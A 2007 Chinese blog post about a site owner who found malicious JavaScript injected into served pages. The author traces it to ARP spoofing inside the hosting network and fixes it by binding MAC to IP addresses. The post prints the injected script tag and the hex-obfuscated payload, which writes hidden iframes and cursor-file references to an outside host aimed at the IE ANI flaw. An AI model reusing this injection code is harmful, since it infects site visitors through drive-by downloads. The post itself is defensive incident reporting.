网站被黑的假象--ARP欺骗之页面中加入一段js


Posted in Javascript onMay 16, 2007

昨天晚上发现访问我的网站的时候网页代码html的前面多了一串js代码。刚开始以为网站被黑了,赶紧到服务器上查看所有文件是否带有这串js代码,搜索结果没有,而且服务器也没发现被入侵的痕迹。
<script src=http://fuck.ns2go.com/dir/index_pic/1.js></script>

于是只能从这段代码入手,我下载这个js开发发现是下面一段代码:

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x31\x2e\x67\x69\x66\'\x29\"\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x32\x2e\x67\x69\x66\'\x29\"\x3e\x3c\/\x44\x49\x56\x3e\x3c\/\x44\x49\x56\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x30\x36\x30\x31\x34\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x31 \x68\x65\x69\x67\x68\x74\x3d\x31\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x74\x6a\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e") 

在google上搜索发现有人已经发现同样情况.http://0e2.net/post/676.html
看了这篇文章之后了解到不是服务器被黑了,而是服务器所在的机房内网有中木马病毒的主机在搞arp欺骗.
这些木马捕抓了我的服务器发送出来的报文之后,篡改了报文的内容,在html头加入了前面那段木马病毒代码.然后再转发给访问我网站的用户主机.这段木马是针对ie的ani漏洞的,微软用户的电脑要赶紧升级打补丁.
最后问题就在于如何让我的服务器防止被ARP欺骗.打电话到机房,技术人员让我们将mac和ip地址绑定,问题终于解决.
关于ARP欺骗相关知识:
http://zhidao.baidu.com/question/7980952.html?si=1
Javascript 相关文章推荐
图片格式的JavaScript和CSS速查手册
Aug 20 Javascript
jquery select(列表)的操作(取值/赋值)
Aug 06 Javascript
基于jQuery的的一个隔行变色,鼠标移动变色的小插件
Jul 06 Javascript
jquery弹出框的用法示例(2)
Aug 26 Javascript
js的2种继承方式详解
Mar 04 Javascript
ajaxFileUpload.js插件支持多文件上传的方法
Sep 02 Javascript
websocket+node.js实现实时聊天系统问题咨询
May 17 Javascript
基于vue实现swipe分页组件实例
May 25 Javascript
Vue keep-alive实践总结(推荐)
Aug 31 Javascript
基于Datatables跳转到指定页的简单实例
Nov 09 Javascript
bootstrap table实现iview固定列的效果实例代码详解
Sep 30 Javascript
javascript实现留言板功能
Feb 08 Javascript
javascript操作文本框readOnly
May 15 #Javascript
静态页面下用javascript操作ACCESS数据库(读增改删)的代码
May 14 #Javascript
User Scripts: Video Download by User Scripts
May 14 #Javascript
javascript之卸载鼠标事件的代码
May 14 #Javascript
getElementById在任意一款浏览器中都可以用吗的疑问回复
May 13 #Javascript
JavaScript脚本语言在网页中的简单应用
May 13 #Javascript
编辑浪子版表单验证类
May 12 #Javascript
You might like
在“咖啡之国”感受咖啡文化
2021/03/03 咖啡文化
PHP set_time_limit(0)长连接的实现分析
2010/03/02 PHP
PHP JSON格式数据交互实例代码详解
2011/01/13 PHP
PHP连接和操作MySQL数据库基础教程
2014/09/29 PHP
[原创]PHPCMS遭遇会员投稿审核无效的解决方法
2017/01/11 PHP
Laravel中七个非常有用但很少人知道的Carbon方法
2017/09/21 PHP
分析Node.js connect ECONNREFUSED错误
2013/04/09 Javascript
JavaScript验证图片类型(扩展名)的函数分享
2014/05/05 Javascript
javascript中的return和闭包函数浅析
2014/06/06 Javascript
JS实现的表格行上下移动操作示例
2016/08/03 Javascript
详谈jQuery Ajax(load,post,get,ajax)的用法
2017/03/02 Javascript
easyui关于validatebox实现多重规则验证的方法(必看)
2017/04/12 Javascript
Vue实现拖放排序功能的实例代码
2019/07/08 Javascript
vue实现滑动超出指定距离回顶部功能
2019/07/31 Javascript
JS实现的雪花飘落特效示例
2019/12/03 Javascript
el-form 多层级表单的实现示例
2020/09/10 Javascript
python判断windows隐藏文件的方法
2014/03/21 Python
python实现数据图表
2017/07/29 Python
解决Python requests库编码 socks5代理的问题
2018/05/07 Python
tensor和numpy的互相转换的实现示例
2019/08/02 Python
Python操作excel的方法总结(xlrd、xlwt、openpyxl)
2019/09/02 Python
Python超越函数积分运算以及绘图实现代码
2019/11/20 Python
基于python实现破解滑动验证码过程解析
2020/05/28 Python
python 进程池pool使用详解
2020/10/15 Python
圣彼得堡鲜花配送:Semicvetic
2020/09/15 全球购物
C有"按引用传递"吗
2016/09/06 面试题
自荐信格式范文
2013/10/07 职场文书
会计找工作求职信范文
2013/12/09 职场文书
大学生村官心得体会范文
2014/01/04 职场文书
幼儿园六一儿童节主持节目串词
2014/03/21 职场文书
软件项目开发计划书
2014/05/01 职场文书
小学校长汇报材料
2014/08/20 职场文书
2014年司法所工作总结
2014/11/22 职场文书
SQL实现LeetCode(175.联合两表)
2021/08/04 MySQL
Nginx反向代理学习实例教程
2021/10/24 Servers
Python可变集合和不可变集合的构造方法大全
2021/12/06 Python